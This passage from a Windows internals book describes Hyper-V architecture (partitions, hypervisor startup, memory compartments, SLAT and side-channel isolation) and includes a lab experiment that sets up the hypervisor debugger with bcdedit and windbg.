Deployment Server needs mainly to update the State Repository. It creates
new entries for the package, for the one or more applications that compose
the package, the new tiles, package capabilities, application license, and so
on. To do this, the AppX Deployment server uses database transactions,
which it finally commits only if no previous errors occurred (otherwise, they
will be discarded). When all the database transactions that compose a State
Repository deployment operation are committed, the State Repository can
call the registered listeners, with the goal of notifying each client that has
requested a notification. (See the “State Repository” section in this chapter
for more information about the change and event tracking feature of the State
Repository.)
The last steps for the package registration include creating the Dependency
Mini Repository file and updating the machine registry to reflect the new
data stored in the State Repository. This terminates the deployment process.
The new application is now ready to be activated and run.
Note
For readability reasons, the deployment process has been significantly
simplified. For example, in the described staging phase, we have omitted
some initial subphases, like the Indexing phase, which parses the AppX
manifest file; the Dependency Manager phase, used to create a work plan
and analyze the package dependencies; and the Package In Use phase,
which has the goal of communicating with PLM to verify that the package
is not already installed and in use.
Furthermore, if an operation fails, the deployment stack must be able to
revert all the changes. The other revert phases have not been described in
the previous section.
Conclusion
In this chapter, we have examined the key base system mechanisms on which
the Windows executive is built. In the next chapter, we introduce the
virtualization technologies that Windows supports with the goal of improving
the overall system security, providing a fast execution environment for virtual
machines, isolated containers, and secure enclaves.
CHAPTER 9
Virtualization technologies
One of the most important technologies used for running multiple operating
systems on the same physical machine is virtualization. At the time of this
writing, there are multiple types of virtualization technologies available from
different hardware manufacturers, which have evolved over the years.
Virtualization technologies are not only used for running multiple operating
systems on a physical machine, but they have also become the basics for
important security features like the Virtual Secure Mode (VSM) and
Hypervisor-Enforced Code Integrity (HVCI), which can’t be run without a
hypervisor.
In this chapter, we give an overview of the Windows virtualization
solution, called Hyper-V. Hyper-V is composed of the hypervisor, which is
the component that manages the platform-dependent virtualization hardware,
and the virtualization stack. We describe the internal architecture of Hyper-V
and provide a brief description of its components (memory manager, virtual
processors, intercepts, scheduler, and so on). The virtualization stack is built
on the top of the hypervisor and provides different services to the root and
guest partitions. We describe all the components of the virtualization stack
(VM Worker process, virtual machine management service, VID driver,
VMBus, and so on) and the different hardware emulation that is supported.
In the last part of the chapter, we describe some technologies based on the
virtualization, such as VSM and HVCI. We present all the secure services
that those technologies provide to the system.
The Windows hypervisor
The Hyper-V hypervisor (also known as Windows hypervisor) is a type-1
(native or bare-metal) hypervisor: a mini operating system that runs directly
on the host’s hardware to manage a single root and one or more guest
operating systems. Unlike type-2 (or hosted) hypervisors, which run on the
base of a conventional OS like normal applications, the Windows hypervisor
abstracts the root OS, which knows about the existence of the hypervisor and
communicates with it to allow the execution of one or more guest virtual
machines. Because the hypervisor is part of the operating system, managing
the guests inside it, as well as interacting with them, is fully integrated in the
operating system through standard management mechanisms such as WMI
and services. In this case, the root OS contains some enlightenments.
Enlightenments are special optimizations in the kernel and possibly device
drivers that detect that the code is being run virtualized under a hypervisor, so
they perform certain tasks differently, or more efficiently, considering this
environment.
Figure 9-1 shows the basic architecture of the Windows virtualization
stack, which is described in detail later in this chapter.
Figure 9-1 The Hyper-V architectural stack (hypervisor and virtualization
stack).
At the bottom of the architecture is the hypervisor, which is launched very
early during the system boot and provides its services for the virtualization
stack to use (through the use of the hypercall interface). The early
initialization of the hypervisor is described in Chapter 12, “Startup and
shutdown.” The hypervisor startup is initiated by the Windows Loader,
which determines whether to start the hypervisor and the Secure Kernel; if
the hypervisor and Secure Kernel are started, the hypervisor uses the services
of the Hvloader.dll to detect the correct hardware platform and load and start
the proper version of the hypervisor. Because Intel and AMD (and ARM64)
processors have differing implementations of hardware-assisted
virtualization, there are different hypervisors. The correct one is selected at
boot-up time after the processor has been queried through CPUID
instructions. On Intel systems, the Hvix64.exe binary is loaded; on AMD
systems, the Hvax64.exe image is used. As of the Windows 10 May 2019
Update (19H1), the ARM64 version of Windows supports its own
hypervisor, which is implemented in the Hvaa64.exe image.
At a high level, the hardware virtualization extension used by the
hypervisor is a thin layer that resides between the OS kernel and the
processor. This layer, which intercepts and emulates in a safe manner
sensitive operations executed by the OS, is run in a higher privilege level
than the OS kernel. (Intel calls this mode VMXROOT. Most books and
literature define the VMXROOT security domain as “Ring -1.”) When an
operation executed by the underlying OS is intercepted, the processor stops
to run the OS code and transfer the execution to the hypervisor at the higher
privilege level. This operation is commonly referred to as a VMEXIT event.
In the same way, when the hypervisor has finished processing the intercepted
operation, it needs a way to allow the physical CPU to restart the execution
of the OS code. New opcodes have been defined by the hardware
virtualization extension, which allow a VMENTER event to happen; the
CPU restarts the execution of the OS code at its original privilege level.
Partitions, processes, and threads
One of the key architectural components behind the Windows hypervisor is
the concept of a partition. A partition essentially represents the main isolation
unit, an instance of an operating system installation, which can refer either to
what’s traditionally called the host or the guest. Under the Windows
hypervisor model, these two terms are not used; instead, we talk of either a
root partition or a child partition, respectively. A partition is composed of
some physical memory and one or more virtual processors (VPs) with their
local virtual APICs and timers. (In the global term, a partition also includes a
virtual motherboard and multiple virtual peripherals. These are virtualization
stack concepts, which do not belong to the hypervisor.)
At a minimum, a Hyper-V system has a root partition—in which the main
operating system controlling the machine runs—the virtualization stack, and
its associated components. Each operating system running within the
virtualized environment represents a child partition, which might contain
certain additional tools that optimize access to the hardware or allow
management of the operating system. Partitions are organized in a
hierarchical way. The root partition has control of each child and receives
some notifications (intercepts) for certain kinds of events that happen in the
child. The majority of the physical hardware accesses that happen in the root
are passed through by the hypervisor; this means that the parent partition is
able to talk directly to the hardware (with some exceptions). As a
counterpart, child partitions are usually not able to communicate directly
with the physical machine’s hardware (again with some exceptions, which
are described later in this chapter in the section “The virtualization stack”).
Each I/O is intercepted by the hypervisor and redirected to the root if needed.
One of the main goals behind the design of the Windows hypervisor was
to have it be as small and modular as possible, much like a microkernel—no
need to support any hypervisor driver or provide a full, monolithic module.
This means that most of the virtualization work is actually done by a separate
virtualization stack (refer to Figure 9-1). The hypervisor uses the existing
Windows driver architecture and talks to actual Windows device drivers.
This architecture results in several components that provide and manage this
behavior, which are collectively called the virtualization stack. Although the
hypervisor is read from the boot disk and executed by the Windows Loader
before the root OS (and the parent partition) even exists, it is the parent
partition that is responsible for providing the entire virtualization stack.
Because these are Microsoft components, only a Windows machine can be a
root partition. The Windows OS in the root partition is responsible for
providing the device drivers for the hardware on the system, as well as for
running the virtualization stack. It’s also the management point for all the
child partitions. The main components that the root partition provides are
shown in Figure 9-2.
Figure 9-2 Components of the root partition.
Child partitions
A child partition is an instance of any operating system running parallel to the
parent partition. (Because you can save or pause the state of any child, it
might not necessarily be running.) Unlike the parent partition, which has full
access to the APIC, I/O ports, and its physical memory (but not access to the
hypervisor’s and Secure Kernel’s physical memory), child partitions are
limited for security and management reasons to their own view of address
space (the Guest Physical Address, or GPA, space, which is managed by the
hypervisor) and have no direct access to hardware (even though they may
have direct access to certain kinds of devices; see the “Virtualization stack”
section for further details). In terms of hypervisor access, a child partition is
also limited mainly to notifications and state changes. For example, a child
partition doesn’t have control over other partitions (and can’t create new
ones).
Child partitions have many fewer virtualization components than a parent
partition because they aren’t responsible for running the virtualization stack
—only for communicating with it. Also, these components can also be
considered optional because they enhance performance of the environment
but aren’t critical to its use. Figure 9-3 shows the components present in a
typical Windows child partition.
Figure 9-3 Components of a child partition.
Processes and threads
The Windows hypervisor represents a virtual machine with a partition data
structure. A partition, as described in the previous section, is composed of
some memory (guest physical memory) and one or more virtual processors
(VP). Internally in the hypervisor, each virtual processor is a schedulable
entity, and the hypervisor, like the standard NT kernel, includes a scheduler.
The scheduler dispatches the execution of virtual processors, which belong to
different partitions, to each physical CPU. (We discuss the multiple types of
hypervisor schedulers later in this chapter in the “Hyper-V schedulers”
section.) A hypervisor thread (TH_THREAD data structure) is the glue
between a virtual processor and its schedulable unit. Figure 9-4 shows the
data structure, which represents the current physical execution context. It
contains the thread execution stack, scheduling data, a pointer to the thread’s
virtual processor, the entry point of the thread dispatch loop (discussed later)
and, most important, a pointer to the hypervisor process that the thread
belongs to.
Figure 9-4 The hypervisor’s thread data structure.
The hypervisor builds a thread for each virtual processor it creates and
associates the newborn thread with the virtual processor data structure
(VM_VP).
A hypervisor process (TH_PROCESS data structure), shown in Figure 9-5,
represents a partition and is a container for its physical (and virtual) address
space. It includes the list of the threads (which are backed by virtual
processors), scheduling data (the physical CPUs affinity in which the process
is allowed to run), and a pointer to the partition basic memory data structures
(memory compartment, reserved pages, page directory root, and so on). A
process is usually created when the hypervisor builds the partition
(VM_PARTITION data structure), which will represent the new virtual
machine.
Figure 9-5 The hypervisor’s process data structure.
Enlightenments
Enlightenments are one of the key performance optimizations that Windows
virtualization takes advantage of. They are direct modifications to the
standard Windows kernel code that can detect that the operating system is
running in a child partition and perform work differently. Usually, these
optimizations are highly hardware-specific and result in a hypercall to notify
the hypervisor.
An example is notifying the hypervisor of a long busy–wait spin loop. The
hypervisor can keep some state on the spin wait and decide to schedule
another VP on the same physical processor until the wait can be satisfied.
Entering and exiting an interrupt state and access to the APIC can be
coordinated with the hypervisor, which can be enlightened to avoid trapping
the real access and then virtualizing it.
Another example has to do with memory management, specifically
translation lookaside buffer (TLB) flushing. (See Part 1, Chapter 5, “Memory
management,” for more information on these concepts.) Usually, the
operating system executes a CPU instruction to flush one or more stale TLB
entries, which affects only a single processor. In multiprocessor systems,
usually a TLB entry must be flushed from every active processor’s cache (the
system sends an inter-processor interrupt to every active processor to achieve
this goal). However, because a child partition could be sharing physical
CPUs with many other child partitions, and some of them could be executing
a different VM’s virtual processor at the time the TLB flush is initiated, such
an operation would also flush this information for those VMs. Furthermore, a
virtual processor would be rescheduled to execute only the TLB flushing IPI,
resulting in noticeable performance degradation. If Windows is running
under a hypervisor, it instead issues a hypercall to have the hypervisor flush
only the specific information belonging to the child partition.
Partition’s privileges, properties, and version
features
When a partition is initially created (usually by the VID driver), no virtual
processors (VPs) are associated with it. At that time, the VID driver is free to
add or remove some partition’s privileges. Indeed, when the partition is first
created, the hypervisor assigns some default privileges to it, depending on its
type.
A partition’s privilege describes which action—usually expressed through
hypercalls or synthetic MSRs (model specific registers)—the enlightened OS
running inside a partition is allowed to perform on behalf of the partition
itself. For example, the Access Root Scheduler privilege allows a child
partition to notify the root partition that an event has been signaled and a
guest’s VP can be rescheduled (this usually increases the priority of the
guest’s VP-backed thread). The Access VSM privilege instead allows the
partition to enable VTL 1 and access its properties and configuration (usually
exposed through synthetic registers). Table 9-1 lists all the privileges
assigned by default by the hypervisor.
Table 9-1 Partition’s privileges
PARTITIO
N TYPE
DEFAULT PRIVILEGES
Root and
child
partition
Read/write a VP’s runtime counter
Read the current partition reference time
Access SynIC timers and registers
Query/set the VP’s virtual APIC assist page
Read/write hypercall MSRs
Request VP IDLE entry
Read VP’s index
Map or unmap the hypercall’s code area
Read a VP’s emulated TSC (time-stamp counter) and its
frequency
Control the partition TSC and re-enlightenment
emulation
Read/write VSM synthetic registers
Read/write VP’s per-VTL registers
Starts an AP virtual processor
Enables partition’s fast hypercall support
Root
partition only
Create child partition
Look up and reference a partition by ID
Deposit/withdraw memory from the partition
compartment
Post messages to a connection port
Signal an event in a connection port’s partition
Create/delete and get properties of a partition’s
connection port
Connect/disconnect to a partition’s connection port
Map/unmap the hypervisor statistics page (which
describe a VP, LP, partition, or hypervisor)
Enable the hypervisor debugger for the partition
Schedule child partition’s VPs and access SynIC
synthetic MSRs
Trigger an enlightened system reset
Read the hypervisor debugger options for a partition
Child
partition only
Generate an extended hypercall intercept in the root
partition
Notify a root scheduler’s VP-backed thread of an event
being signaled
EXO
partition
None
Partition privileges can only be set before the partition creates and starts
any VPs; the hypervisor won’t allow requests to set privileges after a single
VP in the partition starts to execute. Partition properties are similar to
privileges but do not have this limitation; they can be set and queried at any
time. There are different groups of properties that can be queried or set for a
partition. Table 9-2 lists the properties groups.
Table 9-2 Partition’s properties
PROPERT
Y GROUP
DESCRIPTION
Scheduling
properties
Set/query properties related to the classic and core
scheduler, like Cap, Weight, and Reserve
Time
properties
Allow the partition to be suspended/resumed
Debugging
properties
Change the hypervisor debugger runtime configuration
Resource
properties
Queries virtual hardware platform-specific properties of
the partition (like TLB size, SGX support, and so on)
Compatibili
ty
properties
Queries virtual hardware platform-specific properties that
are tied to the initial compatibility features
When a partition is created, the VID infrastructure provides a
compatibility level (which is specified in the virtual machine’s configuration
file) to the hypervisor. Based on that compatibility level, the hypervisor
enables or disables specific virtual hardware features that could be exposed
by a VP to the underlying OS. There are multiple features that tune how the
VP behaves based on the VM’s compatibility level. A good example would
be the hardware Page Attribute Table (PAT), which is a configurable caching
type for virtual memory. Prior to Windows 10 Anniversary Update (RS1),
guest VMs weren’t able to use PAT in guest VMs, so regardless of whether
the compatibility level of a VM specifies Windows 10 RS1, the hypervisor
will not expose the PAT registers to the underlying guest OS. Otherwise, in
case the compatibility level is higher than Windows 10 RS1, the hypervisor
exposes the PAT support to the underlying OS running in the guest VM.
When the root partition is initially created at boot time, the hypervisor
enables the highest compatibility level for it. In that way the root OS can use
all the features supported by the physical hardware.
The hypervisor startup
In Chapter 12, we analyze the modality in which a UEFI-based workstation
boots up, and all the components engaged in loading and starting the correct
version of the hypervisor binary. In this section, we briefly discuss what
happens in the machine after the HvLoader module has transferred the
execution to the hypervisor, which takes control for the first time.
The HvLoader loads the correct version of the hypervisor binary image
(depending on the CPU manufacturer) and creates the hypervisor loader
block. It captures a minimal processor context, which the hypervisor needs to
start the first virtual processor. The HvLoader then switches to a new, just-
created, address space and transfers the execution to the hypervisor image by
calling the hypervisor image entry point, KiSystemStartup, which prepares
the processor for running the hypervisor and initializes the CPU_PLS data
structure. The CPU_PLS represents a physical processor and acts as the
PRCB data structure of the NT kernel; the hypervisor is able to quickly
address it (using the GS segment). Differently from the NT kernel,
KiSystemStartup is called only for the boot processor (the application
processors startup sequence is covered in the “Application Processors (APs)
Startup” section later in this chapter), thus it defers the real initialization to
another function, BmpInitBootProcessor.
BmpInitBootProcessor starts a complex initialization sequence. The
function examines the system and queries all the CPU’s supported
virtualization features (such as the EPT and VPID; the queried features are
platform-specific and vary between the Intel, AMD, or ARM version of the
hypervisor). It then determines the hypervisor scheduler, which will manage
how the hypervisor will schedule virtual processors. For Intel and AMD
server systems, the default scheduler is the core scheduler, whereas the root
scheduler is the default for all client systems (including ARM64). The
scheduler type can be manually overridden through the
hypervisorschedulertype BCD option (more information about the different
hypervisor schedulers is available later in this chapter).
The nested enlightenments are initialized. Nested enlightenments allow the
hypervisor to be executed in nested configurations, where a root hypervisor
(called L0 hypervisor), manages the real hardware, and another hypervisor
(called L1 hypervisor) is executed in a virtual machine. After this stage, the
BmpInitBootProcessor routine performs the initialization of the following
components:
■ Memory manager (initializes the PFN database and the root
compartment).
■ The hypervisor’s hardware abstraction layer (HAL).
■ The hypervisor’s process and thread subsystem (which depends on the
chosen scheduler type). The system process and its initial thread are
created. This process is special; it isn’t tied to any partition and hosts
threads that execute the hypervisor code.
■ The VMX virtualization abstraction layer (VAL). The VAL’s purpose
is to abstract differences between all the supported hardware
virtualization extensions (Intel, AMD, and ARM64). It includes code
that operates on platform-specific features of the machine’s
virtualization technology in use by the hypervisor (for example, on
the Intel platform the VAL layer manages the “unrestricted guest”
support, the EPT, SGX, MBEC, and so on).
■ The Synthetic Interrupt Controller (SynIC) and I/O Memory
Management Unit (IOMMU).
■ The Address Manager (AM), which is the component responsible for
managing the physical memory assigned to a partition (called guest
physical memory, or GPA) and its translation to real physical memory
(called system physical memory). Although the first implementation
of Hyper-V supported shadow page tables (a software technique for
address translation), since Windows 8.1, the Address manager uses
platform-dependent code for configuring the hypervisor address
translation mechanism offered by the hardware (extended page tables
for Intel, nested page tables for AMD). In hypervisor terms, the
physical address space of a partition is called address domain. The
platform-independent physical address space translation is commonly
called Second Layer Address Translation (SLAT). The term refers to
the Intel’s EPT, AMD’s NPT or ARM 2-stage address translation
mechanism.
The hypervisor can now finish constructing the CPU_PLS data structure
associated with the boot processor by allocating the initial hardware-
dependent virtual machine control structures (VMCS for Intel, VMCB for
AMD) and by enabling virtualization through the first VMXON operation.
Finally, the per-processor interrupt mapping data structures are initialized.
EXPERIMENT: Connecting the hypervisor debugger
In this experiment, you will connect the hypervisor debugger for
analyzing the startup sequence of the hypervisor, as discussed in
the previous section. The hypervisor debugger is supported only via
serial or network transports. Only physical machines can be used to
debug the hypervisor, or virtual machines in which the “nested
virtualization” feature is enabled (see the “Nested virtualization”
section later in this chapter). In the latter case, only serial
debugging can be enabled for the L1 virtualized hypervisor.
For this experiment, you need a separate physical machine that
supports virtualization extensions and has the Hyper-V role
installed and enabled. You will use this machine as the debugged
system, attached to your host system (which acts as the debugger)
where you are running the debugging tools. As an alternative, you
can set up a nested VM, as shown in the “Enabling nested
virtualization on Hyper-V” experiment later in this chapter (in that
case you don’t need another physical machine).
As a first step, you need to download and install the “Debugging
Tools for Windows” in the host system, which are available as part
of the Windows SDK (or WDK), downloadable from
https://developer.microsoft.com/en-
us/windows/downloads/windows-10-sdk. As an alternative, for this
experiment you also can use the WinDbgX, which, at the time of
this writing, is available in the Windows Store by searching
“WinDbg Preview.”
The debugged system for this experiment must have Secure Boot
disabled. The hypervisor debugging is not compatible with Secure
Boot. Refer to your workstation user manual for understanding
how to disable Secure Boot (usually the Secure Boot settings are
located in the UEFI Bios). For enabling the hypervisor debugger in
the debugged system, you should first open an administrative
command prompt (by typing cmd in the Cortana search box and
selecting Run as administrator).
In case you want to debug the hypervisor through your network
card, you should type the following commands, replacing the terms
<HostIp> with the IP address of the host system; <HostPort>”
with a valid port in the host (from 49152); and
<NetCardBusParams> with the bus parameters of the network
card of the debugged system, specified in the XX.YY.ZZ format
(where XX is the bus number, YY is the device number, and ZZ is
the function number). You can discover the bus parameters of your
network card through the Device Manager applet or through the
KDNET.exe tool available in the Windows SDK:
Click here to view code image
bcdedit /hypervisorsettings net hostip:<HostIp> port:<HostPort>
bcdedit /set {hypervisorsettings} hypervisordebugpages 1000
bcdedit /set {hypervisorsettings} hypervisorbusparams
<NetCardBusParams>
bcdedit /set hypervisordebug on
The following figure shows a sample system in which the
network interface used for debugging the hypervisor is located in
the 0.25.0 bus parameters, and the debugger is targeting a host
system configured with the IP address 192.168.0.56 on the port
58010.
Take note of the returned debugging key. After you reboot the
debugged system, you should run Windbg in the host, with the
following command:
Click here to view code image
windbg.exe -d -k net:port=<HostPort>,key=<DebuggingKey>
You should be able to debug the hypervisor, and follow its
startup sequence, even though Microsoft may not release the
symbols for the main hypervisor module:
In a VM with nested virtualization enabled, you can enable the
L1 hypervisor debugger only through the serial port by using the
following command in the debugged system:
Click here to view code image
bcdedit /hypervisorsettings SERIAL DEBUGPORT:1
BAUDRATE:115200
The creation of the root partition and the boot
virtual processor
The first steps that a fully initialized hypervisor needs to execute are the
creation of the root partition and the first virtual processor used for starting
the system (called BSP VP). Creating the root partition follows almost the
same rules as for child partitions; multiple layers of the partition are
initialized one after the other. In particular:
1.
The VM-layer initializes the maximum allowed number of VTL
levels and sets up the partition privileges based on the partition’s type
(see the previous section for more details). Furthermore, the VM layer
determines the partition’s allowable features based on the specified
partition’s compatibility level. The root partition supports the
maximum allowable features.
2.
The VP layer initializes the virtualized CPUID data, which all the
virtual processors of the partition use when a CPUID is requested
from the guest operating system. The VP layer creates the hypervisor
process, which backs the partition.
3.
The Address Manager (AM) constructs the partition’s initial physical
address space by using machine platform-dependent code (which
builds the EPT for Intel, NPT for AMD). The constructed physical
address space depends on the partition type. The root partition uses
identity mapping, which means that all the guest physical memory
corresponds to the system physical memory (more information is
provided later in this chapter in the “Partitions’ physical address
space” section).
Finally, after the SynIC, IOMMU, and the intercepts’ shared pages are
correctly configured for the partition, the hypervisor creates and starts the
BSP virtual processor for the root partition, which is the unique one used to
restart the boot process.
A hypervisor virtual processor (VP) is represented by a big data structure
(VM_VP), shown in Figure 9-6. A VM_VP data structure maintains all the
data used to track the state of the virtual processor: its platform-dependent
registers state (like general purposes, debug, XSAVE area, and stack) and
data, the VP’s private address space, and an array of VM_VPLC data
structures, which are used to track the state of each Virtual Trust Level
(VTL) of the virtual processor. The VM_VP also includes a pointer to the
VP’s backing thread and a pointer to the physical processor that is currently
executing the VP.
Figure 9-6 The VM_VP data structure representing a virtual processor.
As for the partitions, creating the BSP virtual processor is similar to the
process of creating normal virtual processors. VmAllocateVp is the function
responsible in allocating and initializing the needed memory from the
partition’s compartment, used for storing the VM_VP data structure, its
platform-dependent part, and the VM_VPLC array (one for each supported
VTL). The hypervisor copies the initial processor context, specified by the
HvLoader at boot time, into the VM_VP structure and then creates the VP’s
private address space and attaches to it (only in case address space isolation
is enabled). Finally, it creates the VP’s backing thread. This is an important
step: the construction of the virtual processor continues in the context of its
own backing thread. The hypervisor’s main system thread at this stage waits
until the new BSP VP is completely initialized. The wait brings the
hypervisor scheduler to select the newly created thread, which executes a
routine, ObConstructVp, that constructs the VP in the context of the new
backed thread.
ObConstructVp, in a similar way as for partitions, constructs and initializes
each layer of the virtual processor—in particular, the following:
1.
The Virtualization Manager (VM) layer attaches the physical
processor data structure (CPU_PLS) to the VP and sets VTL 0 as
active.
2.
The VAL layer initializes the platform-dependent portions of the VP,
like its registers, XSAVE area, stack, and debug data. Furthermore,
for each supported VTL, it allocates and initializes the VMCS data
structure (VMCB for AMD systems), which is used by the hardware
for keeping track of the state of the virtual machine, and the VTL’s
SLAT page tables. The latter allows each VTL to be isolated from
each other (more details about VTLs are provided later in the “Virtual
Trust Levels (VTLs) and Virtual Secure Mode (VSM)” section) .
Finally, the VAL layer enables and sets VTL 0 as active. The
platform-specific VMCS (or VMCB for AMD systems) is entirely
compiled, the SLAT table of VTL 0 is set as active, and the real-mode
emulator is initialized. The Host-state part of the VMCS is set to
target the hypervisor VAL dispatch loop. This routine is the most
important part of the hypervisor because it manages all the VMEXIT
events generated by each guest.
3.
The VP layer allocates the VP’s hypercall page, and, for each VTL,
the assist and intercept message pages. These pages are used by the
hypervisor for sharing code or data with the guest operating system.
When ObConstructVp finishes its work, the VP’s dispatch thread activates
the virtual processor and its synthetic interrupt controller (SynIC). If the VP
is the first one of the root partition, the dispatch thread restores the initial
VP’s context stored in the VM_VP data structure by writing each captured
register in the platform-dependent VMCS (or VMCB) processor area (the
context has been specified by the HvLoader earlier in the boot process). The
dispatch thread finally signals the completion of the VP initialization (as a
result, the main system thread enters the idle loop) and enters the platform-
dependent VAL dispatch loop. The VAL dispatch loop detects that the VP is
new, prepares it for the first execution, and starts the new virtual machine by
executing a VMLAUNCH instruction. The new VM restarts exactly at the
point at which the HvLoader has transferred the execution to the hypervisor.
The boot process continues normally but in the context of the new hypervisor
partition.
The hypervisor memory manager
The hypervisor memory manager is relatively simple compared to the
memory manager for NT or the Secure Kernel. The entity that manages a set
of physical memory pages is the hypervisor’s memory compartment. Before
the hypervisor startup takes palace, the hypervisor loader (Hvloader.dll)
allocates the hypervisor loader block and pre-calculates the maximum
number of physical pages that will be used by the hypervisor for correctly
starting up and creating the root partition. The number depends on the pages
used to initialize the IOMMU to store the memory range structures, the
system PFN database, SLAT page tables, and HAL VA space. The
hypervisor loader preallocates the calculated number of physical pages,
marks them as reserved, and attaches the page list array in the loader block.
Later, when the hypervisor starts, it creates the root compartment by using
the page list that was allocated by the hypervisor loader.
Figure 9-7 shows the layout of the memory compartment data structure.
The data structure keeps track of the total number of physical pages
“deposited” in the compartment, which can be allocated somewhere or freed.
A compartment stores its physical pages in different lists ordered by the
NUMA node. Only the head of each list is stored in the compartment. The
state of each physical page and its link in the NUMA list is maintained
thanks to the entries in the PFN database. A compartment also tracks its
relationship with the root. A new compartment can be created using the
physical pages that belongs to the parent (the root). Similarly, when the
compartment is deleted, all its remaining physical pages are returned to the
parent.
Figure 9-7 The hypervisor’s memory compartment. Virtual address space
for the global zone is reserved from the end of the compartment data
structure
When the hypervisor needs some physical memory for any kind of work, it
allocates from the active compartment (depending on the partition). This
means that the allocation can fail. Two possible scenarios can arise in case of
failure:
■ If the allocation has been requested for a service internal to the
hypervisor (usually on behalf of the root partition), the failure should
not happen, and the system is crashed. (This explains why the initial
calculation of the total number of pages to be assigned to the root
compartment needs to be accurate.)
■ If the allocation has been requested on behalf of a child partition
(usually through a hypercall), the hypervisor will fail the request with
the status INSUFFICIENT_MEMORY. The root partition detects the
error and performs the allocation of some physical page (more details
are discussed later in the “Virtualization stack” section), which will be
deposited in the child compartment through the HvDepositMemory
hypercall. The operation can be finally reinitiated (and usually will
succeed).
The physical pages allocated from the compartment are usually mapped in
the hypervisor using a virtual address. When a compartment is created, a
virtual address range (sized 4 or 8 GB, depending on whether the
compartment is a root or a child) is allocated with the goal of mapping the
new compartment, its PDE bitmap, and its global zone.
A hypervisor’s zone encapsulates a private VA range, which is not shared
with the entire hypervisor address space (see the “Isolated address space”
section later in this chapter). The hypervisor executes with a single root page
table (differently from the NT kernel, which uses KVA shadowing). Two
entries in the root page table page are reserved with the goal of dynamically
switching between each zone and the virtual processors’ address spaces.
Partitions’ physical address space
As discussed in the previous section, when a partition is initially created, the
hypervisor allocates a physical address space for it. A physical address space
contains all the data structures needed by the hardware to translate the
partition’s guest physical addresses (GPAs) to system physical addresses
(SPAs). The hardware feature that enables the translation is generally referred
to as second level address translation (SLAT). The term SLAT is platform-
agnostic: hardware vendors use different names: Intel calls it EPT for
extended page tables; AMD uses the term NPT for nested page tables; and
ARM simply calls it Stage 2 Address Translation.
The SLAT is usually implemented in a way that’s similar to the
implementation of the x64 page tables, which uses four levels of translation
(the x64 virtual address translation has already been discussed in detail in
Chapter 5 of Part 1). The OS running inside the partition uses the same
virtual address translation as if it were running by bare-metal hardware.
However, in the former case, the physical processor actually executes two
levels of translation: one for virtual addresses and one for translating physical
addresses. Figure 9-8 shows the SLAT set up for a guest partition. In a guest
partition, a GPA is usually translated to a different SPA. This is not true for
the root partition.
Figure 9-8 Address translation for a guest partition.
When the hypervisor creates the root partition, it builds its initial physical
address space by using identity mapping. In this model, each GPA
corresponds to the same SPA (for example, guest frame 0x1000 in the root
partition is mapped to the bare-metal physical frame 0x1000). The hypervisor
preallocates the memory needed for mapping the entire physical address
space of the machine (which has been discovered by the Windows Loader
using UEFI services; see Chapter 12 for details) into all the allowed root
partition’s virtual trust levels (VTLs). (The root partition usually supports
two VTLs.) The SLAT page tables of each VTL belonging to the partition
include the same GPA and SPA entries but usually with a different protection
level set. The protection level applied to each partition’s physical frame
allows the creation of different security domains (VTL), which can be
isolated one from each other. VTLs are explained in detail in the section
“The Secure Kernel” later in this chapter. The hypervisor pages are marked
as hardware-reserved and are not mapped in the partition’s SLAT table
(actually they are mapped using an invalid entry pointing to a dummy PFN).
Note
For performance reasons, the hypervisor, while building the physical
memory mapping, is able to detect large chunks of contiguous physical
memory, and, in a similar way as for virtual memory, is able to map those
chunks by using large pages. If for some reason the OS running in the
partition decides to apply a more granular protection to the physical page,
the hypervisor would use the reserved memory for breaking the large page
in the SLAT table.
Earlier versions of the hypervisor also supported another technique for
mapping a partition’s physical address space: shadow paging. Shadow
paging was used for those machines without the SLAT support. This
technique had a very high-performance overhead; as a result, it’s not
supported anymore. (The machine must support SLAT; otherwise, the
hypervisor would refuse to start.)
The SLAT table of the root is built at partition-creation time, but for a
guest partition, the situation is slightly different. When a child partition is
created, the hypervisor creates its initial physical address space but allocates
only the root page table (PML4) for each partition’s VTL. Before starting the
new VM, the VID driver (part of the virtualization stack) reserves the
physical pages needed for the VM (the exact number depends on the VM
memory size) by allocating them from the root partition. (Remember, we are
talking about physical memory; only a driver can allocate physical pages.)
The VID driver maintains a list of physical pages, which is analyzed and split
in large pages and then is sent to the hypervisor through the
HvMapGpaPages Rep hypercall.
Before sending the map request, the VID driver calls into the hypervisor
for creating the needed SLAT page tables and internal physical memory
space data structures. Each SLAT page table hierarchy is allocated for each
available VTL in the partition (this operation is called pre-commit). The
operation can fail, such as when the new partition’s compartment could not
contain enough physical pages. In this case, as discussed in the previous
section, the VID driver allocates more memory from the root partition and
deposits it in the child’s partition compartment. At this stage, the VID driver
can freely map all the child’s partition physical pages. The hypervisor builds
and compiles all the needed SLAT page tables, assigning different protection
based on the VTL level. (Large pages require one less indirection level.) This
step concludes the child partition’s physical address space creation.
Address space isolation
Speculative execution vulnerabilities discovered in modern CPUs (also
known as Meltdown, Spectre, and Foreshadow) allowed an attacker to read
secret data located in a more privileged execution context by speculatively
reading the stale data located in the CPU cache. This means that software
executed in a guest VM could potentially be able to speculatively read private
memory that belongs to the hypervisor or to the more privileged root
partition. The internal details of the Spectre, Meltdown, and all the side-
channel vulnerabilities and how they are mitigated by Windows have been
covered in detail in Chapter 8.
The hypervisor has been able to mitigate most of these kinds of attacks by
implementing the HyperClear mitigation. The HyperClear mitigation relies
on three key components to ensure strong Inter-VM isolation: core scheduler,
Virtual-Processor Address Space Isolation, and sensitive data scrubbing. In
modern multicore CPUs, often different SMT threads share the same CPU
cache. (Details about the core scheduler and symmetric multithreading are
provided in the “Hyper-V schedulers” section.) In the virtualization
environment, SMT threads on a core can independently enter and exit the
hypervisor context based on their activity. For example, events like interrupts
can cause an SMT thread to switch out of running the guest virtual processor
context and begin executing the hypervisor context. This can happen
independently for each SMT thread, so one SMT thread may be executing in
the hypervisor context while its sibling SMT thread is still running a VM’s
guest virtual processor context. An attacker running code in a less trusted
guest VM’s virtual processor context on one SMT thread can then use a side
channel vulnerability to potentially observe sensitive data from the
hypervisor context running on the sibling SMT thread.
The hypervisor provides strong data isolation to protect against a malicious
guest VM by maintaining separate virtual address ranges for each guest SMT
thread (which back a virtual processor). When the hypervisor context is
entered on a specific SMT thread, no secret data is addressable. The only
data that can be brought into the CPU cache is associated with that current
guest virtual processor or represent shared hypervisor data. As shown in
Figure 9-9, when a VP running on an SMT thread enters the hypervisor, it is
enforced (by the root scheduler) that the sibling LP is running another VP
that belongs to the same VM. Furthermore, no shared secrets are mapped in
the hypervisor. In case the hypervisor needs to access secret data, it assures
